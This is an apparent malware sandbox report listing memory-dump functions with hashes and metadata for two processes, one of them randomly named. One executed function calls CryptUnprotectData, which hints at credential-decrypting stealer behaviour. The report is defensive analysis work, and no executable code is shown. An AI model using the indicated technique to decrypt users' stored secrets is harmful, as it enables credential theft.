Opcode Fuzzy Hash: 1c982c9c7a96ce5b62878df0634423eedd2213543f0512c82911d1ca023b9eff
Instruction Fuzzy Hash: 08216230A1A65E8BEB65EF788869AFD7BE0FF18304F41057BD41DC60A1DE35E2548B80

Function 00007FFD9B8BA4B1 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46a4a828b833b523e410598cfb9adb89209c07f2034ab5b1b3703d5075d34d89
Instruction ID: 967400050b333271380bb6540b7a1ef88f1334a77780ff87939142556f99c756
Opcode Fuzzy Hash: 46a4a828b833b523e410598cfb9adb89209c07f2034ab5b1b3703d5075d34d89
Instruction Fuzzy Hash: E9215E70A0964D8FDB98EF68C4999AD3BE0FF1C304F01016AE809C3165DB34E540CB80

Function 00007FFD9B8B3814 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc3b329f7f25f4039120ff8a5043f62f7c2793925ef734b2e46dde610bf45b4
Instruction ID: 80c572ed0fbf7894f5051757c24c7fd803591ee1ab64f742349964f7d740ee33
Opcode Fuzzy Hash: 1dc3b329f7f25f4039120ff8a5043f62f7c2793925ef734b2e46dde610bf45b4
Instruction Fuzzy Hash: 5D21AEB1A0E90E8FE798DF68D8657F97BE1EB85314F5000BEC009D32DADBBA14458B41

Function 00007FFD9B8B0A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321e9d3fa445551894c1ae732bbe28cac6812b0ba326b2755eaf6865e85d1e34
Instruction ID: b881f961c1ec2b2adb258fa6a35d1572fef6910d6fe5c7e8d4753dacacba663c
Opcode Fuzzy Hash: 321e9d3fa445551894c1ae732bbe28cac6812b0ba326b2755eaf6865e85d1e34
Instruction Fuzzy Hash: 6211B230E2A51E4FE790EBB888695FD7BE0FF58740F4159B6D018C70A6EE34A6408B80

Function 00007FFD9B8B120D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95683492cf902839fa82e109628bb2d1cedf08e3467d1598e6d1d97589feb916
Instruction ID: 1a805db6d630bcddc09c3180e90555dcba3b33b34ce1ea2045501b0f5c3b9b37
Opcode Fuzzy Hash: 95683492cf902839fa82e109628bb2d1cedf08e3467d1598e6d1d97589feb916
Instruction Fuzzy Hash: 7A11E630A1A65F4EEB65EBB4C4A96F97BE0FF5A311F01057EC419CA1E2DE246540CB40

Function 00007FFD9B8B0F25 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1889482c8ca2baa59c0919638cc55503107dc9be23149ef04b705fa25e78a218
Instruction ID: 2e0c00ea87a447227726a71ec7bd1748a43ff89f34941c70b5b23dca1f04df50
Opcode Fuzzy Hash: 1889482c8ca2baa59c0919638cc55503107dc9be23149ef04b705fa25e78a218
Instruction Fuzzy Hash: 5A113031F1991D8BEB64EB64C865FED73A2EB58300F1142B5C40AA72A5DE34AA41CFC0

Function 00007FFD9B8BADA8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d534ca64df6560386279f15d138626ece53d2760606dc5308cf45235242da5
Instruction ID: b555e663558451507bd265f1ace25a154abc6b333e795aa2d60d7976557b5157
Opcode Fuzzy Hash: f3d534ca64df6560386279f15d138626ece53d2760606dc5308cf45235242da5
Instruction Fuzzy Hash: BD110630A0891E8FDB94EF68C459ABA7BE1FF29305F11057EA41ED71A5CA30A650CF80

Function 00007FFD9B8BBC35 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f4e67e4261d433c23df3d11a05ab64a3d19f5663e43ece03df2b7511c4c624
Instruction ID: 5d667f3ec4d37f09696760c7fb5d211f6e36f1d4f852377547ce8b92e477063b
Opcode Fuzzy Hash: e8f4e67e4261d433c23df3d11a05ab64a3d19f5663e43ece03df2b7511c4c624
Instruction Fuzzy Hash: D7117C30A0A65E8FEB95EB64C8682BD7BE0FF18301F0104BAD419C21A1DE35A640CB40

Function 00007FFD9B8BC671 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf6e3c2d3d35d76908cf85f5531e5b887e1d39ce30a2229b15291f63c63251a
Instruction ID: 523bfdc424f06421e7930e15ebac1f5f5c8633152ed6b5409d4a6694ca359d96
Opcode Fuzzy Hash: 9cf6e3c2d3d35d76908cf85f5531e5b887e1d39ce30a2229b15291f63c63251a
Instruction Fuzzy Hash: 1D012D70A09A5E8FDB94EF68C859AAA3FE0FF29301F01056AE418C71A2DB34D550CB81

Function 00007FFD9B8BB847 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab4b52401149f02f8a0e3856b2a9f3a705cca6c2f05b96e96b730a4bdf9c96a
Instruction ID: efdb7aa2a3692d5a54c23fe5326a998124f55272eb5f06908c2e6b775b0a307f
Opcode Fuzzy Hash: 1ab4b52401149f02f8a0e3856b2a9f3a705cca6c2f05b96e96b730a4bdf9c96a
Instruction Fuzzy Hash: 0E111930E1492E8ADB64EFA4D8616EDB7B1EF5C301F0041B5C419D22A1DF746A85CF80

Function 00007FFD9B8B2EEA Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015c977ffabc5cc440d83f9118a2771b71c732324cdbe938d38d2f0c4370d1a6
Instruction ID: e3e787ccc2f5d9a7fcf239d2720740473946a72444d9ec12a2b723791775fb58
Opcode Fuzzy Hash: 015c977ffabc5cc440d83f9118a2771b71c732324cdbe938d38d2f0c4370d1a6
Instruction Fuzzy Hash: 2701D230A5E65E4FE761EFB484695A97FF0FF0A300F0644BAD40CC71B2EA38A1548B41

Function 00007FFD9B8B05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d48fd2d3e1caa357e753f29c622eea0e45dd1244cc10b01d6ec5cd0b439dce6
Instruction ID: ae6c7ed1ba26e51ad59c37f0b99503eaf952df269648b1f988ba3688a383a086
Opcode Fuzzy Hash: 1d48fd2d3e1caa357e753f29c622eea0e45dd1244cc10b01d6ec5cd0b439dce6
Instruction Fuzzy Hash: 3D018C30A1950E8FDBA8EF64C4A56BA77A1FF5C304F21047EE41ECA1A4CA35A650CB80

Function 00007FFD9B8B1D01 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8397f1cbd9f254c8fb9a544e57d4dc9b3191ef92ce06868820f5ec86bf656639
Instruction ID: 432faeaccc717c3754a8486ca7797f90a60fea88509df9e913133c79d3028867
Opcode Fuzzy Hash: 8397f1cbd9f254c8fb9a544e57d4dc9b3191ef92ce06868820f5ec86bf656639
Instruction Fuzzy Hash: CE01DB30A1A69E8FDB99EF6484655BA7BA0FF59300F55007AD408CB1E2DB35D550CB80

Function 00007FFD9B8BAD90 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d4715fc542b090c8f20218e5ebaaed04f4da18097df6796c41f7f88abec822
Instruction ID: 7d36935c52e9472455e237ff77ec840fe6bb63f1652f4765bdae633d42391309
Opcode Fuzzy Hash: 65d4715fc542b090c8f20218e5ebaaed04f4da18097df6796c41f7f88abec822
Instruction Fuzzy Hash: 0B014C30A1551E8EEB58EF68C8696BE76E0FF18304F11087AD41EC21A5DE346290CA41

Function 00007FFD9B8BADD8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a9e6d6cc88866dd5472ec0ba5e46a92d4ab2f543721ee3f79e099806859bef
Instruction ID: ecb82bd364007adb1fe60891ca45f33c6a97576c24d4218af66f32b0052a945e
Opcode Fuzzy Hash: 30a9e6d6cc88866dd5472ec0ba5e46a92d4ab2f543721ee3f79e099806859bef
Instruction Fuzzy Hash: 08010C30A1591E9AEFA4EBA4C4686BD76E0FF18305F11047AD82ED21A5DE356691CF40

Function 00007FFD9B8B28CD Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ec33aece5b5f47ac1dc9d9c9949cdcbf2cdc4edc04f2f49193909aaa2f7f07
Instruction ID: 66a108a6858b8826a9a204ed2db952118efefe12fd06a7a26eb299e0f4f4a4f5
Opcode Fuzzy Hash: 17ec33aece5b5f47ac1dc9d9c9949cdcbf2cdc4edc04f2f49193909aaa2f7f07
Instruction Fuzzy Hash: 0101B530A1E55E4FE761EFB484599B97BE0FF19300F0205B6D40CC61B6DE34E5448B81

Function 00007FFD9B8B2F69 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2d8269e759433df7dc4291ad26f11042ee0069316bb7fe38a71830f50c9461
Instruction ID: b1e7352d549f9eeb7c1a95a7a9d3252770c8574c132228253100ed1b27148612
Opcode Fuzzy Hash: cc2d8269e759433df7dc4291ad26f11042ee0069316bb7fe38a71830f50c9461
Instruction Fuzzy Hash: 6F018470A4E65E4FE772ABB488695A97FE0EF5A300F0604F6D408C71B6DA28E5548B41

Function 00007FFD9B8BA9F9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9cf4dfc7124b969cd526aee82bea68c5845764d5b43f957494a58e0961495d
Instruction ID: 97fc7dae0ce1e1251864dda647852d2b50750f4ec43eb29057bd75022ae2a208
Opcode Fuzzy Hash: 7f9cf4dfc7124b969cd526aee82bea68c5845764d5b43f957494a58e0961495d
Instruction Fuzzy Hash: EF018430A5E69E5FE762AB7489695A97FE0EF0E300F0618F6D408C70B6DE38A5448B51

Function 00007FFD9B8B0610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc454461c8585c0b59a7154b6628019145624176cccfbb39df00c639a103ab61
Instruction ID: b2f6f3c584831f21e5f3e86522ca5d471a8ad22c0d011a193afd80875e08fd29
Opcode Fuzzy Hash: bc454461c8585c0b59a7154b6628019145624176cccfbb39df00c639a103ab61
Instruction Fuzzy Hash: CA01AD30A1990E8AEB68EFB4C0686B97BA0FF08304F1008BED41EC61E4CE35E240CA40

Function 00007FFD9B8B0608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2a64e924d50500c4dcc06cdcea2d8db86e6d2a71e5dfb1e307bbef5f95eeab
Instruction ID: 611a06b1365324cdf6d06163883cc387c34badf9bcff726dc9a6ee2e33ad2750
Opcode Fuzzy Hash: ca2a64e924d50500c4dcc06cdcea2d8db86e6d2a71e5dfb1e307bbef5f95eeab
Instruction Fuzzy Hash: 27016D30A5591E8EEB59EFB4D4686BA76A0FF1C305F11087EE41EC61E5DE35A250CA80

Function 00007FFD9B8D5980 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d272b06c9695e30c2d14568dd49622e7d16f85ea6492371fc0004ad0e3ada51
Instruction ID: 926ae8775c15e89bb68809183eb34a6e98e87dfb8fb04a82ba68a34d9240b0dd
Opcode Fuzzy Hash: 3d272b06c9695e30c2d14568dd49622e7d16f85ea6492371fc0004ad0e3ada51
Instruction Fuzzy Hash: 24016D30A1951E9EEB50FBB884586FA77E0FF5C311F010A77D41CC30A5DE34A2408B41

Function 00007FFD9B8BC815 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d005b299e12217a44130fe05b85a4f0ec1985ecbc9782da9c56b91742657dd
Instruction ID: 4d70cb0bc80c2ca9fb3f5577de772b349d78d0610b10f6a72c7cca8f1f47bf66
Opcode Fuzzy Hash: b6d005b299e12217a44130fe05b85a4f0ec1985ecbc9782da9c56b91742657dd
Instruction Fuzzy Hash: FBF03630E1560E8EDB68EF58C8156BE77E0FF58305F10093AE41DD2160DB349650C740

Function 00007FFD9B8B1220 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c894c848bad165dea7359b09cb9a517a1c4a81f2b72de2e5b8c44321ed278f18
Instruction ID: 8e8375951a1a3e356bd1f5d070aa7624ef95eb747ea856c6f58ac29df3bf7e6d
Opcode Fuzzy Hash: c894c848bad165dea7359b09cb9a517a1c4a81f2b72de2e5b8c44321ed278f18
Instruction Fuzzy Hash: 42F02D30A1A65F49EB64EFB884682F977E0FF1A315F00043ED41DC50F1DE241254C640

Function 00007FFD9B8B05D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c51d1ea75e7f10f95a19f662cdf29379b8ccd516286d2e588843c3c9fadce47
Instruction ID: 065b62399387ff62514532a593d9d60148cc593e657876477e70908405fa1a86
Opcode Fuzzy Hash: 2c51d1ea75e7f10f95a19f662cdf29379b8ccd516286d2e588843c3c9fadce47
Instruction Fuzzy Hash: 9EF0C830A1A55E8FDB98EF7494656FA7790EF09304F15047AE40DC7195CA35A650CBC0

Function 00007FFD9B8BC099 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb51b0894ef648a9157b367bbd6ca42b5ef13cd27dde427d129dd22de5cd677
Instruction ID: 13418bfa9a02b30a91332920a62a0bace80d6a0a6916d3f8489eb9c48cbb0779
Opcode Fuzzy Hash: bdb51b0894ef648a9157b367bbd6ca42b5ef13cd27dde427d129dd22de5cd677
Instruction Fuzzy Hash: 8E018630A1D69E4FDB559F7488285F93BB0FF0A205F4505BBD819C60A2DB385654CB41

Function 00007FFD9B8BBD65 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0cb7b0d3da6b721c24765d7d9602198fb4ca19a596dace0ad0f0da1d6c3d38
Instruction ID: 9e750ef7467ea46774654ac843395f42e7b8b3311df9501901b4b8246bec7517
Opcode Fuzzy Hash: 1f0cb7b0d3da6b721c24765d7d9602198fb4ca19a596dace0ad0f0da1d6c3d38
Instruction Fuzzy Hash: 5201C870E0911EABDB28DF94E8909FDB7B5EF58311F250539E446A22A1DB786A40CF80

Function 00007FFD9B8B27E9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4adcaa92c023c9e8dc8406e97aae2ef2c31853df6e0598974e9fcd5c02a0a8f
Instruction ID: 2fbd4faa9822caaf36542bb3ef836a52e3c7eda274945d3996c8f8bcd07e2c4a
Opcode Fuzzy Hash: d4adcaa92c023c9e8dc8406e97aae2ef2c31853df6e0598974e9fcd5c02a0a8f
Instruction Fuzzy Hash: 77F0A43090E79E8FD75A9F7088251A93F60BF05301F0504BBD419C61E3DA289554C781

Function 00007FFD9B8B285D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21a64aacd71ac9960e5479928b61ea6c9fc3453c2442e232b46e74cb8532bc1
Instruction ID: 83fd2225230d4eccf60479a105736e86bce36c15298d4daa288d824c1bcb8e01
Opcode Fuzzy Hash: f21a64aacd71ac9960e5479928b61ea6c9fc3453c2442e232b46e74cb8532bc1
Instruction Fuzzy Hash: DAF0F030A0E64E8FEB699FB888691E93BA0FF09200F4104BAE419C51E6DB38D5408A81

Function 00007FFD9B8BBDB7 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction ID: 715f0a5f14ae16eeb453d096f0f20636eee9b57d51de2a77c771549d595b8781
Opcode Fuzzy Hash: d14c68c6ac486703bea40b4d19bbe023f32ed64f68c717eb0eeb62bf48c65e26
Instruction Fuzzy Hash: ACF0B670E0511EAFDB18DF94E8909EDB7B1FF58311F250539E416A72A0DB786940CF80

Function 00007FFD9B8BB7F3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1720070455.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8b0000_providerwebmonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a21ca14bc8d371cfb6c2d79de96221bcc3fdae802c94404d73e54175d725db
Instruction ID: 683d20ca170f752b43bce2e4df81321a199576cc3a50b1109bb80d9513de4ede
Opcode Fuzzy Hash: a9a21ca14bc8d371cfb6c2d79de96221bcc3fdae802c94404d73e54175d725db
Instruction Fuzzy Hash: 95D09E20A1945D4AEB64EB54C450BA9B264FF18340F1486F1801EE2156DA346A818F80

Analysis Process: aVgRtcWKvuiHvUKTYwWvDjIq.exePID: 6660, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BA77E7E Relevance: 1.7, APIs: 1, Instructions: 200
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32 ref: 00007FFD9BA77FD3

Memory Dump Source

Source File: 00000014.00000002.2936784144.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9ba70000_aVgRtcWKvuiHvUKTYwWvDjIq.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: cf659b4bafe62feb8714b587d38809d5641747588934ea00187225955989f317
Instruction ID: 0c25843c2b715c1b661a8806fbadbb8c0f9ec2a6fa25ab479cfd5d754c8804d7
Opcode Fuzzy Hash: cf659b4bafe62feb8714b587d38809d5641747588934ea00187225955989f317
Instruction Fuzzy Hash: 28510831A1CA888FDB59AB6C98566B97BE0EF59310F0441BFE049C3293DE64AC45C782

Function 00007FFD9BA77E31 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.2936784144.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9ba70000_aVgRtcWKvuiHvUKTYwWvDjIq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac841e21c74eab2a8a40e6dc000940081c89556f382fd5b0d497ee1e710e8aa0
Instruction ID: 5b475b2d66269c9f3b54676003c02611a066eeaad97bdb76bfc30ae66463f329
Opcode Fuzzy Hash: ac841e21c74eab2a8a40e6dc000940081c89556f382fd5b0d497ee1e710e8aa0
Instruction Fuzzy Hash: C9512731A1CB884FDB19AB6C98556B97BE0EF56320F0442BFE049C3293DA64AC45C7C2

Function 00007FFD9BA77E6F Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.2936784144.00007FFD9BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9ba70000_aVgRtcWKvuiHvUKTYwWvDjIq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817185b5e009b452601ea9a7c87672a412aaab44e741ffca68e6d4398e5a6602
Instruction ID: 3c29afe992491114f10208abee12e2617880abdaf88de5b9c5ed65b6649dcfbe
Opcode Fuzzy Hash: 817185b5e009b452601ea9a7c87672a412aaab44e741ffca68e6d4398e5a6602
Instruction Fuzzy Hash: E341493191DB889FDB19DB589C466B97BE0EF56320F0441AFE089C3293DB646C56CBC2

Function 00007FFD9B8C5A20 Relevance: 1.4, Instructions: 1449
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.2933695879.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b8c1000_aVgRtcWKvuiHvUKTYwWvDjIq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63935bd5842d613d6a567ee2ab327ec04f21dff28ab6c2d279175b8ac869349e
Instruction ID: 305573be37222dbebc252a2097ef414d8e8e8b6ae43ba048a9225fd5df83118e
Opcode Fuzzy Hash: 63935bd5842d613d6a567ee2ab327ec04f21dff28ab6c2d279175b8ac869349e
Instruction Fuzzy Hash: 12C2CA70A1991D8FDBA9EB58C8A5BA8B3F1FF59300F5145EAD01DD3295CA34AE81CF40

Function 00007FFD9B8BC748 Relevance: 4.0, Strings: 3, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^, xrefs: 00007FFD9B8BC839
[}K, xrefs: 00007FFD9B8BC75F
_, xrefs: 00007FFD9B8BC939

Memory Dump Source

Source File: 00000014.00000002.2933695879.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9b8ba000_aVgRtcWKvuiHvUKTYwWvDjIq.jbxd

Similarity

API ID:
String ID: ^$_$[}K
API String ID: 0-2908032992
